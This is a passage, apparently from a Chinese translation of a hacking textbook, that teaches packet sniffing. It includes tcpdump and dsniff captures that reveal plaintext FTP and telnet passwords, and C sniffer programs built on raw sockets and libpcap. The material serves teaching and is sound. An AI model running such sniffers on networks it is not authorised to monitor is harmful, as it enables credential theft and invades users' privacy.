          RX packets:17115 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4602913 (4.3 MiB)  TX bytes:434449 (424.2 KiB)
          Interrupt:16 Base address:0x2024

reader@hacking:~/booksrc $ sudo ifconfig eth0 promisc
reader@hacking:~/booksrc $ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:0C:29:34:61:65
          UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1
          RX packets:17181 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4668475 (4.4 MiB)  TX bytes:434449 (424.2 KiB)

          Interrupt:16 Base address:0x2024

reader@hacking:~/booksrc $

捕获并非一定供公众查看的数据包的行为被称为嗅探。在非交换网络上以混杂模式嗅探数据包可以揭示各种有用的信息，如下面的输出所示。

reader@hacking:~/booksrc $ sudo tcpdump -l -X 'ip host 192.168.0.118'
tcpdump: listening on eth0
21:27:44.684964 192.168.0.118.ftp > 192.168.0.193.32778: P 1:42(41) ack 1 win
17316 <nop,nop,timestamp 466808 920202> (DF)
0x0000   4500 005d e065 4000 8006 97ad c0a8 0076        E..].e@........v
0x0010   c0a8 00c1 0015 800a 292e 8a73 5ed4 9ce8        ........)..s^...
0x0020   8018 43a4 a12f 0000 0101 080a 0007 1f78        ..C../.........x
0x0030   000e 0a8a 3232 3020 5459 5053 6f66 7420        ....220.TYPSoft.
0x0040   4654 5020 5365 7276 6572 2030 2e39 392e        FTP.Server.0.99.
0x0050   3133                                           13
21:27:44.685132 192.168.0.193.32778 > 192.168.0.118.ftp: . ack 42 win 5840
<nop,nop,timestamp 920662 466808> (DF) [tos 0x10]
0x0000   4510 0034 966f 4000 4006 21bd c0a8 00c1        E..4.o@.@.!.....
0x0010   c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c        ...v....^...)...
0x0020   8010 16d0 81db 0000 0101 080a 000e 0c56        ...............V
0x0030   0007 1f78                                      ...x
21:27:52.406177 192.168.0.193.32778 > 192.168.0.118.ftp: P 1:13(12) ack 42 win
5840 <nop,nop,timestamp 921434 466808> (DF) [tos 0x10]
0x0000   4510 0040 9670 4000 4006 21b0 c0a8 00c1        E..@.p@.@.!.....
0x0010   c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c        ...v....^...)...
0x0020   8018 16d0 edd9 0000 0101 080a 000e 0f5a        ...............Z
0x0030   0007 1f78 5553 4552 206c 6565 6368 0d0a        ...xUSER`.leech..`
21:27:52.415487 192.168.0.118.ftp > 192.168.0.193.32778: P 42:76(34) ack 13
win 17304 <nop,nop,timestamp 466885 921434> (DF)
0x0000   4500 0056 e0ac 4000 8006 976d c0a8 0076        E..V..@....m...v
0x0010   c0a8 00c1 0015 800a 292e 8a9c 5ed4 9cf4        ........)...^...
0x0020   8018 4398 4e2c 0000 0101 080a 0007 1fc5        ..C.N,..........
0x0030   000e 0f5a 3333 3120 5061 7373 776f 7264        ...Z331.Password
0x0040   2072 6571 7569 7265 6420 666f 7220 6c65        .required.for.le
0x0050   6563                                           ec
21:27:52.415832 192.168.0.193.32778 > 192.168.0.118.ftp: . ack 76 win 5840
<nop,nop,timestamp 921435 466885> (DF) [tos 0x10]
0x0000   4510 0034 9671 4000 4006 21bb c0a8 00c1        E..4.q@.@.!.....
0x0010   c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe        ...v....^...)...
0x0020   8010 16d0 7e5b 0000 0101 080a 000e 0f5b        ....~[.........[
0x0030   0007 1fc5                                      ....
21:27:56.155458 192.168.0.193.32778 > 192.168.0.118.ftp: P 13:27(14) ack 76
win 5840 <nop,nop,timestamp 921809 466885> (DF) [tos 0x10]
0x0000   4510 0042 9672 4000 4006 21ac c0a8 00c1        E..B.r@.@.!.....
0x0010   c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe        ...v....^...)...
0x0020   8018 16d0 90b5 0000 0101 080a 000e 10d1        ................
0x0030   0007 1fc5 5041 5353 206c 3840 6e69 7465        ....PASS.`l8@nite`
0x0040   0d0a                                           ..
21:27:56.179427 192.168.0.118.ftp > 192.168.0.193.32778: P 76:103(27) ack 27
win 17290 <nop,nop,timestamp 466923 921809> (DF)
0x0000   4500 004f e0cc 4000 8006 9754 c0a8 0076        E..O..@....T...v
0x0010   c0a8 00c1 0015 800a 292e 8abe 5ed4 9d02        ........)...^...
0x0020   8018 438a 4c8c 0000 0101 080a 0007 1feb        ..C.L...........
0x0030   000e 10d1 3233 3020 5573 6572 206c 6565        ....230.User.lee
0x0040   6368 206c 6f67 6765 6420 696e 2e0d 0a          ch.logged.in...

通过 telnet、FTP 和 POP3 等服务在网络中传输的数据是不加密的。在先前的例子中，可以看到用户leech正在使用密码l8@nite登录 FTP 服务器。由于登录过程中的认证过程也是不加密的，因此用户名和密码只是包含在传输数据包的数据部分中。

tcpdump是一个功能强大的通用数据包嗅探器，但也有一些专门设计的嗅探工具，旨在搜索用户名和密码。一个值得注意的例子是 Dug Song 的程序dsniff，它足够智能，可以解析出看起来重要的数据。

reader@hacking:~/booksrc $ sudo dsniff -n
dsniff: listening on eth0
-----------------
12/10/02 21:43:21 tcp 192.168.0.193.32782 -> 192.168.0.118.21 (ftp)
USER leech
PASS l8@nite

-----------------
12/10/02 21:47:49 tcp 192.168.0.193.32785 -> 192.168.0.120.23 (telnet)
USER root 
PASS 5eCr3t

原始套接字嗅探器

到目前为止，在我们的代码示例中，我们一直在使用流套接字。当使用流套接字发送和接收时，数据被整洁地封装在 TCP/IP 连接中。访问会话（5）层的 OSI 模型，操作系统负责所有低级传输、纠正和路由的细节。可以使用原始套接字在网络较低层进行访问。在这一层，所有细节都暴露出来，必须由程序员显式处理。原始套接字通过使用SOCK_RAW作为类型来指定。在这种情况下，协议很重要，因为有多种选项。协议可以是IPPROTO_TCP, IPPROTO_UDP或IPPROTO_ICMP。以下是一个使用原始套接字的 TCP 嗅探程序的示例。

raw_tcpsniff.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include "hacking.h"

int main(void) {
   int i, recv_length, sockfd;

   u_char buffer[9000];

   if ((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
      fatal("in socket");

   for(i=0; i < 3; i++) {
      recv_length = recv(sockfd, buffer, 8000, 0);
      printf("Got a %d byte packet\n", recv_length);
      dump(buffer, recv_length);
   }
}

此程序打开一个原始 TCP 套接字并监听三个数据包，使用dump()函数打印每个数据包的原始数据。请注意，缓冲区被声明为一个u_char变量。这只是一个来自 sys/socket.h 的便利类型定义，展开为"unsigned char"。这是为了方便，因为在网络编程中经常使用无符号变量，每次都输入unsigned是很麻烦的。

编译后，程序需要以 root 用户身份运行，因为使用原始套接字需要 root 权限。以下输出显示了程序在发送示例文本到我们的简单服务器时嗅探网络。

reader@hacking:~/booksrc $ gcc -o raw_tcpsniff raw_tcpsniff.c
reader@hacking:~/booksrc $ ./raw_tcpsniff
[!!] Fatal Error in socket: Operation not permitted
reader@hacking:~/booksrc $ sudo ./raw_tcpsniff
Got a 68 byte packet
45 10 00 44 1e 36 40 00 40 06 46 23 c0 a8 2a 01 | E..D.6@.@.F#..*.
c0 a8 2a f9 8b 12 1e d2 ac 14 cf 92 e5 10 6c c9 | ..*...........l.
80 18 05 b4 32 47 00 00 01 01 08 0a 26 ab 9a f1 | ....2G......&...
02 3b 65 b7 74 68 69 73 20 69 73 20 61 20 74 65 | .;e.this is a te
73 74 0d 0a                                     | st..
Got a 70 byte packet
45 10 00 46 1e 37 40 00 40 06 46 20 c0 a8 2a 01 | E..F.7@.@.F ..*.
c0 a8 2a f9 8b 12 1e d2 ac 14 cf a2 e5 10 6c c9 | ..*...........l.
80 18 05 b4 27 95 00 00 01 01 08 0a 26 ab a0 75 | ....'.......&..u
02 3c 1b 28 41 41 41 41 41 41 41 41 41 41 41 41 | .<.(AAAAAAAAAAAA
41 41 41 41 0d 0a                               | AAAA..
Got a 71 byte packet
45 10 00 47 1e 38 40 00 40 06 46 1e c0 a8 2a 01 | E..G.8@.@.F...*.
c0 a8 2a f9 8b 12 1e d2 ac 14 cf b4 e5 10 6c c9 | ..*...........l.
80 18 05 b4 68 45 00 00 01 01 08 0a 26 ab b6 e7 | ....hE......&...
02 3c 20 ad 66 6a 73 64 61 6c 6b 66 6a 61 73 6b | .< .fjsdalkfjask
66 6a 61 73 64 0d 0a                            | fjasd..
reader@hacking:~/booksrc $

虽然这个程序可以捕获数据包，但它并不可靠，可能会错过一些数据包，尤其是在流量很大的时候。此外，它只捕获 TCP 数据包——要捕获 UDP 或 ICMP 数据包，需要为每个数据包打开额外的原始套接字。原始套接字的一个大问题是它们在系统之间非常不一致。Linux 的原始套接字代码很可能在 BSD 或 Solaris 上无法工作。这使得使用原始套接字进行多平台编程几乎不可能。

libpcap 嗅探器

可以使用一个标准化的编程库 libpcap 来平滑原始套接字的不一致性。这个库中的函数仍然使用原始套接字来完成它们的魔法，但这个库知道如何在多个架构上正确地与原始套接字一起工作。tcpdump 和 dsniff 都使用 libpcap，这使得它们可以在任何平台上相对容易地编译。让我们用 libpcap 的函数重写原始数据包嗅探程序，而不是使用我们自己的。这些函数非常直观，所以我们将使用以下代码列表来讨论它们。

pcap_sniff.c

#include <pcap.h>
#include "hacking.h"

void pcap_fatal(const char *failed_in, const char *errbuf) {
   printf("Fatal Error in %s: %s\n", failed_in, errbuf);
   exit(1); 
}

首先，包含 pcap.h 提供由 pcap 函数使用的各种结构和定义。我还编写了一个pcap_fatal()函数来显示致命错误。pcap 函数使用错误缓冲区来返回错误和状态消息，因此这个函数被设计为向用户显示这个缓冲区。

int main() {
   struct pcap_pkthdr header;
   const u_char *packet;
   char errbuf[PCAP_ERRBUF_SIZE];
   char *device;
   pcap_t *pcap_handle;
   int i;

errbuf变量是前面提到的错误缓冲区，其大小来自 pcap.h 中的一个定义，设置为256。头变量是一个pcap_pkthdr结构，包含有关数据包的额外捕获信息，例如捕获时间和长度。pcap_handle指针的工作方式类似于文件描述符，但用于引用一个数据包捕获对象。

device = pcap_lookupdev(errbuf);
if(device == NULL)
   pcap_fatal("pcap_lookupdev", errbuf);

printf("Sniffing on device %s\n", device);

pcap_lookupdev()函数寻找一个合适的设备进行嗅探。该设备作为字符串指针返回，引用静态函数内存。对于我们的系统，这始终是/dev/eth0，尽管在 BSD 系统上可能不同。如果函数找不到合适的接口，它将返回NULL。

pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
if(pcap_handle == NULL)
   pcap_fatal("pcap_open_live", errbuf);

与套接字函数和文件打开函数类似，pcap_open_live() 函数打开一个数据包捕获设备，并返回对该设备的句柄。此函数的参数包括要嗅探的设备、最大数据包大小、混杂标志、超时值以及错误缓冲区的指针。由于我们想要以混杂模式进行捕获，所以混杂标志被设置为 1。

for(i=0; i < 3; i++) {
      packet = pcap_next(pcap_handle, &header);
      printf("Got a %d byte packet\n", header.len);
      dump(packet, header.len);
   }
   pcap_close(pcap_handle);
}

最后，数据包捕获循环使用 pcap_next() 来获取下一个数据包。此函数接收 pcap_handle 和一个指向 pcap_pkthdr 结构的指针，以便填充捕获的详细信息。函数返回数据包的指针，然后打印数据包，从捕获头中获取长度。然后 pcap_close() 关闭捕获接口。

当这个程序编译时，必须链接 pcap 库。这可以通过 GCC 的 -l 标志来完成，如下面的输出所示。在这个系统上已经安装了 pcap 库，因此库和包含文件已经位于编译器已知的标准位置。

reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff.c
/tmp/ccYgieqx.o: In function `main':
pcap_sniff.c:(.text+0x1c8): undefined reference to `pcap_lookupdev'
pcap_sniff.c:(.text+0x233): undefined reference to `pcap_open_live'
pcap_sniff.c:(.text+0x282): undefined reference to `pcap_next'
pcap_sniff.c:(.text+0x2c2): undefined reference to `pcap_close'
collect2: ld returned 1 exit status
reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff.c -l pcap
reader@hacking:~/booksrc $ ./pcap_sniff
Fatal Error in pcap_lookupdev: no suitable device found
reader@hacking:~/booksrc $ sudo ./pcap_sniff
Sniffing on device eth0
Got a 82 byte packet
00 01 6c eb 1d 50 00 01 29 15 65 b6 08 00 45 10 | ..l..P..).e...E.
00 44 1e 39 40 00 40 06 46 20 c0 a8 2a 01 c0 a8 | .D.9@.@.F ..*...
2a f9 8b 12 1e d2 ac 14 cf c7 e5 10 6c c9 80 18 | *...........l...
05 b4 54 1a 00 00 01 01 08 0a 26 b6 a7 76 02 3c | ..T.......&..v.<
37 1e 74 68 69 73 20 69 73 20 61 20 74 65 73 74 | 7.this is a test
0d 0a                                           | ..
Got a 66 byte packet
00 01 29 15 65 b6 00 01 6c eb 1d 50 08 00 45 00 | ..).e...l..P..E.
00 34 3d 2c 40 00 40 06 27 4d c0 a8 2a f9 c0 a8 | .4=,@.@.'M..*...
2a 01 1e d2 8b 12 e5 10 6c c9 ac 14 cf d7 80 10 | *.......l.......
05 a8 2b 3f 00 00 01 01 08 0a 02 47 27 6c 26 b6 | ..+?.......G'l&.
a7 76                                           | .v
Got a 84 byte packet
00 01 6c eb 1d 50 00 01 29 15 65 b6 08 00 45 10 | ..l..P..).e...E.
00 46 1e 3a 40 00 40 06 46 1d c0 a8 2a 01 c0 a8 | .F.:@.@.F...*...
2a f9 8b 12 1e d2 ac 14 cf d7 e5 10 6c c9 80 18 | *...........l...
05 b4 11 b3 00 00 01 01 08 0a 26 b6 a9 c8 02 47 | ..........&....G
27 6c 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | 'lAAAAAAAAAAAAAA
41 41 0d 0a                                     | AA..
reader@hacking:~/booksrc $

注意到数据包中样本文本之前有许多字节，其中许多字节是相似的。由于这些是原始数据包捕获，其中大部分字节是用于以太网、IP 和 TCP 的头部信息层。

解码层结构

在我们的数据包捕获中，最外层是以太网，这也是最低的可视层。这一层用于在具有 MAC 地址的以太网端点之间发送数据。这一层的头部包含源 MAC 地址、目的 MAC 地址以及一个描述以太网数据包类型的 16 位值。在 Linux 上，此头部的结构定义在 /usr/include/linux/if_ethernet.h 中，IP 头部的结构位于 /usr/include/netinet/ip.h 中，TCP 头部的结构位于 /usr/include/netinet/tcp.h 中。tcpdump 的源代码也有这些头部的结构，或者我们可以根据 RFCs 创建自己的头部结构。通过编写自己的结构可以获得更好的理解，因此让我们使用结构定义作为指导来创建自己的数据包头部结构，并将其包含在 hacking-network.h 中。

首先，让我们看看以太网头部的现有定义。

来自 /usr/include/if_ether.h

#define ETH_ALEN  6   /* Octets in one ethernet addr   */
#define ETH_HLEN  14    /* Total octets in header */

/*
 *  This is an Ethernet frame header.
 */

struct ethhdr {
  unsigned char h_dest[ETH_ALEN]; /* Destination eth addr */
  unsigned char h_source[ETH_ALEN]; /* Source ether addr  */
  __be16    h_proto;    /* Packet type ID field */
} __attribute__((packed));

此结构包含以太网头部的三个元素。__be16 变量的声明实际上是一个 16 位无符号短整数的类型定义。这可以通过在包含文件中递归地搜索类型定义来确定。

reader@hacking:~/booksrc $
$ grep -R "typedef.*__be16" /usr/include
`/usr/include/linux/types.h:typedef __u16 __bitwise __be16;`

$ grep -R "typedef.*__u16" /usr/include | grep short
/usr/include/linux/i2o-dev.h:typedef unsigned short __u16;
`/usr/include/linux/cramfs_fs.h:typedef unsigned short __u16;`
/usr/include/asm/types.h:typedef unsigned short __u16;
$

包含文件还定义了以太网头部长度为 ETH_HLEN，为 14 字节。这是合理的，因为源地址和目标 MAC 地址各占用 6 字节，而数据包类型字段是一个 16 位短整数，占用 2 字节。然而，许多编译器会为了对齐而在 4 字节边界上填充结构，这意味着 sizeof(struct ethhdr) 会返回错误的大小。为了避免这种情况，应该使用 ETH_HLEN 或 14 字节的固定值作为以太网头部长度。

通过包含 <linux/if_ether.h>，这些包含所需 __be16 类型定义的其他包含文件也被包含进来了。由于我们想要为 hacking-network.h 创建自己的结构，我们应该去除对未知类型定义的引用。在此过程中，让我们也给这些字段起更好的名字。

添加到 hacking-network.h

#define ETHER_ADDR_LEN 6
#define ETHER_HDR_LEN 14

struct ether_hdr {
  unsigned char ether_dest_addr[ETHER_ADDR_LEN]; // Destination MAC address
  unsigned char ether_src_addr[ETHER_ADDR_LEN];  // Source MAC address
  unsigned short ether_type; // Type of Ethernet packet
};

我们可以用相同的方法处理 IP 和 TCP 结构，使用相应的结构和 RFC 图作为参考。

来自 `/usr/include/netinet/ip.h`

struct iphdr
  {
#if __BYTE_ORDER == __LITTLE_ENDIAN
    unsigned int ihl:4;
    unsigned int version:4;
#elif __BYTE_ORDER == __BIG_ENDIAN
    unsigned int version:4;
    unsigned int ihl:4;
#else
# error "Please fix <bits/endian.h>"
#endif
    u_int8_t tos;
    u_int16_t tot_len;
    u_int16_t id;
    u_int16_t frag_off;
    u_int8_t ttl;
    u_int8_t protocol;
    u_int16_t check;
    u_int32_t saddr;
    u_int32_t daddr;
    /*The options start here. */
  };

来自 RFC 791

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

                    Example Internet Datagram Header

结构中的每个元素都对应于 RFC 头部图示中的字段。由于前两个字段，版本和 IHL（互联网头部长度）只有四位大小，而在 C 中没有 4 位变量类型，Linux 头部定义根据主机的字节序不同而将字节分割成不同的部分。这些字段以网络字节序排列，因此，如果主机是小端字节序，IHL 应该在版本之前，因为字节序是相反的。就我们的目的而言，我们实际上不会使用这两个字段中的任何一个，所以我们甚至不需要分割字节。

添加到 hacking-network.h

struct ip_hdr {
  unsigned char ip_version_and_header_length; // Version and header length
  unsigned char ip_tos;          // Type of service
  unsigned short ip_len;         // Total length
  unsigned short ip_id;          // Identification number
  unsigned short ip_frag_offset; // Fragment offset and flags
  unsigned char ip_ttl;          // Time to live
  unsigned char ip_type;         // Protocol type
  unsigned short ip_checksum;    // Checksum
  unsigned int ip_src_addr;      // Source IP address
  unsigned int ip_dest_addr;     // Destination IP address
};

如前所述，编译器填充会将此结构对齐到 4 字节边界，通过填充结构的其余部分。IP 头部总是 20 字节。

对于 TCP 数据包头部，我们参考 /usr/include/netinet/tcp.h 中的结构以及 RFC 793 中的头部图示。

从 `/usr/include/netinet/tcp.h`

typedef u_int32_t tcp_seq;
/*
 * TCP header.
 * Per RFC 793, September, 1981.
 */
struct tcphdr
  {
    u_int16_t th_sport;   /* source port */
    u_int16_t th_dport;   /* destination port */
    tcp_seq th_seq;   /* sequence number */
    tcp_seq th_ack;   /* acknowledgment number */
#  if __BYTE_ORDER == __LITTLE_ENDIAN
    u_int8_t th_x2:4;   /* (unused) */
    u_int8_t th_off:4;    /* data offset */
#  endif
#  if __BYTE_ORDER == __BIG_ENDIAN
    u_int8_t th_off:4;    /* data offset */
    u_int8_t th_x2:4;   /* (unused) */
#  endif
    u_int8_t th_flags;
#  define TH_FIN  0x01
#  define TH_SYN  0x02
#  define TH_RST  0x04
#  define TH_PUSH 0x08
#  define TH_ACK  0x10
#  define TH_URG  0x20
    u_int16_t th_win;   /* window */
    u_int16_t th_sum;   /* checksum */
    u_int16_t th_urp;   /* urgent pointer */
};

来自 RFC 793

   TCP Header Format

     0                   1                   2                   3
     0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |          Source Port          |       Destination Port        |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                        Sequence Number                        |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                    Acknowledgment Number                      |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |  Data |           |U|A|P|R|S|F|                               |
    | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
    |       |           |G|K|H|T|N|N|                               |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |           Checksum            |         Urgent Pointer        |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                    Options                    |    Padding    |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                             data                              |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 Data Offset: 4 bits
     The number of 32 bit words in the TCP Header.  This indicates where
     the data begins.  The TCP header (even one including options) is an
     integral number of 32 bits long.
 Reserved: 6 bits
     Reserved for future use.  Must be zero.
 Options: variable

Linux 的 tcphdr 结构也会根据主机的字节序切换 4 位数据偏移字段和保留字段的 4 位部分。数据偏移字段很重要，因为它告诉我们可变长度 TCP 头部的大小。你可能已经注意到 Linux 的 tcphdr 结构没有为 TCP 选项保留任何空间。这是因为 RFC 将此字段定义为可选的。TCP 头部的大小总是 32 位对齐的，数据偏移告诉我们头部中有多少个 32 位字。因此，TCP 头部的大小（以字节为单位）等于头部中的数据偏移字段乘以四。由于数据偏移字段是计算头部大小所必需的，我们将包含它的字节分割，假设主机是小端字节序。

Linux 的 tcphdr 结构中的 th_flags 字段定义为 8 位无符号字符。在此字段以下定义的值是对应于六个可能标志的位掩码。

添加到 hacking-network.h

struct tcp_hdr {
  unsigned short tcp_src_port;   // Source TCP port
  unsigned short tcp_dest_port;  // Destination TCP port
  unsigned int tcp_seq;          // TCP sequence number
  unsigned int tcp_ack;          // TCP acknowledgment number
  unsigned char reserved:4;      // 4 bits from the 6 bits of reserved space
  unsigned char tcp_offset:4;    // TCP data offset for little-endian host
  unsigned char tcp_flags;       // TCP flags (and 2 bits from reserved space)
#define TCP_FIN   0x01
#define TCP_SYN   0x02
#define TCP_RST   0x04
#define TCP_PUSH  0x08
#define TCP_ACK   0x10
#define TCP_URG   0x20
  unsigned short tcp_window;     // TCP window size
  unsigned short tcp_checksum;   // TCP checksum
  unsigned short tcp_urgent;     // TCP urgent pointer
};

现在头部已定义为结构，我们可以编写一个程序来解码每个数据包的分层头部。但在我们这样做之前，让我们谈谈 libpcap。这个库有一个名为pcap_loop()的函数，它比简单地循环调用pcap_next()捕获数据包更好。实际上，很少的程序使用pcap_next()，因为它笨拙且效率低下。pcap_loop()函数使用回调函数。这意味着pcap_loop()函数传递一个函数指针，每次捕获数据包时都会调用该函数。pcap_loop()的原型如下：

int pcap_loop(pcap_t *handle, int count, pcap_handler callback, u_char *args);

第一个参数是 pcap 的处理句柄，下一个参数是要捕获的数据包数量，第三个参数是回调函数的函数指针。如果将计数参数设置为-1，它将循环直到程序跳出。最后一个参数是一个可选的指针，它将被传递给回调函数。自然地，回调函数需要遵循一定的原型，因为pcap_loop()必须调用这个函数。回调函数可以取任何你喜欢的名字，但参数必须如下：

void callback(u_char *args, const struct pcap_pkthdr *cap_header, const u_char *packet);

第一个参数是来自pcap_loop()最后一个参数的可选参数指针。它可以用来向回调函数传递额外信息，但我们不会使用它。接下来的两个参数应该来自pcap_next()：一个指向捕获头部的指针和一个指向数据包本身的指针。

以下示例代码使用pcap_loop()和回调函数来捕获数据包，并使用我们的头部结构来解码它们。这个程序将在代码列出时进行解释。

decode_sniff.c

#include <pcap.h>
#include "hacking.h"
#include "hacking-network.h"

void pcap_fatal(const char *, const char *);
void decode_ethernet(const u_char *);
void decode_ip(const u_char *);
u_int decode_tcp(const u_char *);

void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);

int main() {
   struct pcap_pkthdr cap_header;
   const u_char *packet, *pkt_data;
   char errbuf[PCAP_ERRBUF_SIZE];
   char *device;
   pcap_t *pcap_handle;

   device = pcap_lookupdev(errbuf);
   if(device == NULL)
      pcap_fatal("pcap_lookupdev", errbuf);

   printf("Sniffing on device %s\n", device);

   pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
   if(pcap_handle == NULL)
      pcap_fatal("pcap_open_live", errbuf);

   pcap_loop(pcap_handle, 3, caught_packet, NULL);

   pcap_close(pcap_handle);
}

在此程序的开头，声明了回调函数的原型，该函数名为caught_packet()，以及几个解码函数。main()函数中的其他内容基本上相同，只是将 for 循环替换为对pcap_loop()的单次调用。这个函数传递了pcap_handle，指示捕获三个数据包，并指向回调函数caught_packet()。最后一个参数是NULL，因为我们没有要传递给caught_packet()的额外数据。此外，请注意，decode_tcp()函数返回一个u_int。由于 TCP 头部长度是可变的，这个函数返回 TCP 头部的长度。

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char
*packet) {
   int tcp_header_length, total_header_size, pkt_data_len;
   u_char *pkt_data;

   printf("==== Got a %d byte packet ====\n", cap_header->len);

   decode_ethernet(packet);
   decode_ip(packet+ETHER_HDR_LEN);
   tcp_header_length = decode_tcp(packet+ETHER_HDR_LEN+sizeof(struct ip_hdr));

   total_header_size = ETHER_HDR_LEN+sizeof(struct ip_hdr)+tcp_header_length;
   pkt_data = (u_char *)packet + total_header_size;  // pkt_data points to the data
 portion.
   pkt_data_len = cap_header->len - total_header_size;
   if(pkt_data_len > 0) {
      printf("\t\t\t%u bytes of packet data\n", pkt_data_len);
      dump(pkt_data, pkt_data_len);
   } else
      printf("\t\t\tNo Packet Data\n");
}

void pcap_fatal(const char *failed_in, const char *errbuf) {
   printf("Fatal Error in %s: %s\n", failed_in, errbuf);
   exit(1); 
}

当pcap_loop()捕获数据包时，会调用caught_packet()函数。这个函数使用头部长度来按层分割数据包，并使用解码函数打印出每层头部的详细信息。

void decode_ethernet(const u_char *header_start) {
   int i;
   const struct ether_hdr *ethernet_header;

   ethernet_header = (const struct ether_hdr *)header_start;
   printf("[[  Layer 2 :: Ethernet Header  ]]\n");
   printf("[ Source: %02x", ethernet_header->ether_src_addr[0]);
   for(i=1; i < ETHER_ADDR_LEN; i++)
      printf(":%02x", ethernet_header->ether_src_addr[i]);

   printf("\tDest: %02x", ethernet_header->ether_dest_addr[0]);
   for(i=1; i < ETHER_ADDR_LEN; i++)
      printf(":%02x", ethernet_header->ether_dest_addr[i]);
   printf("\tType: %hu ]\n", ethernet_header->ether_type);
}

void decode_ip(const u_char *header_start) {
   const struct ip_hdr *ip_header;

   ip_header = (const struct ip_hdr *)header_start;
   printf("\t((  Layer 3 ::: IP Header  ))\n");
   printf("\t( Source: %s\t", inet_ntoa(ip_header->ip_src_addr));
   printf("Dest: %s )\n", inet_ntoa(ip_header->ip_dest_addr));
   printf("\t( Type: %u\t", (u_int) ip_header->ip_type);
   printf("ID: %hu\tLength: %hu )\n", ntohs(ip_header->ip_id), ntohs(ip_header->ip_len));
}

u_int decode_tcp(const u_char *header_start) {
   u_int header_size;
   const struct tcp_hdr *tcp_header;

   tcp_header = (const struct tcp_hdr *)header_start;
   header_size = 4 * tcp_header->tcp_offset;

   printf("\t\t{{  Layer 4 :::: TCP Header  }}\n");
   printf("\t\t{ Src Port: %hu\t", ntohs(tcp_header->tcp_src_port));
   printf("Dest Port: %hu }\n", ntohs(tcp_header->tcp_dest_port));
   printf("\t\t{ Seq #: %u\t", ntohl(tcp_header->tcp_seq));
   printf("Ack #: %u }\n", ntohl(tcp_header->tcp_ack));
   printf("\t\t{ Header Size: %u\tFlags: ", header_size);
   if(tcp_header->tcp_flags & TCP_FIN)
      printf("FIN ");
   if(tcp_header->tcp_flags & TCP_SYN)
      printf("SYN ");
   if(tcp_header->tcp_flags & TCP_RST)
      printf("RST ");
   if(tcp_header->tcp_flags & TCP_PUSH)
      printf("PUSH ");
   if(tcp_header->tcp_flags & TCP_ACK)
      printf("ACK ");
   if(tcp_header->tcp_flags & TCP_URG)
      printf("URG ");
   printf(" }\n");

   return header_size; 
}

解码函数接收一个指向头部开始的指针，该指针被转换为适当的结构类型。这允许访问头部的各个字段，但重要的是要记住这些值将以网络字节序存储。这些数据直接来自线缆，因此需要将字节序转换为在x86 处理器上使用。

reader@hacking:~/booksrc $ gcc -o decode_sniff decode_sniff.c -lpcap
reader@hacking:~/booksrc $ sudo ./decode_sniff
Sniffing on device eth0
==== Got a 75 byte packet ====
[[  Layer 2 :: Ethernet Header  ]]
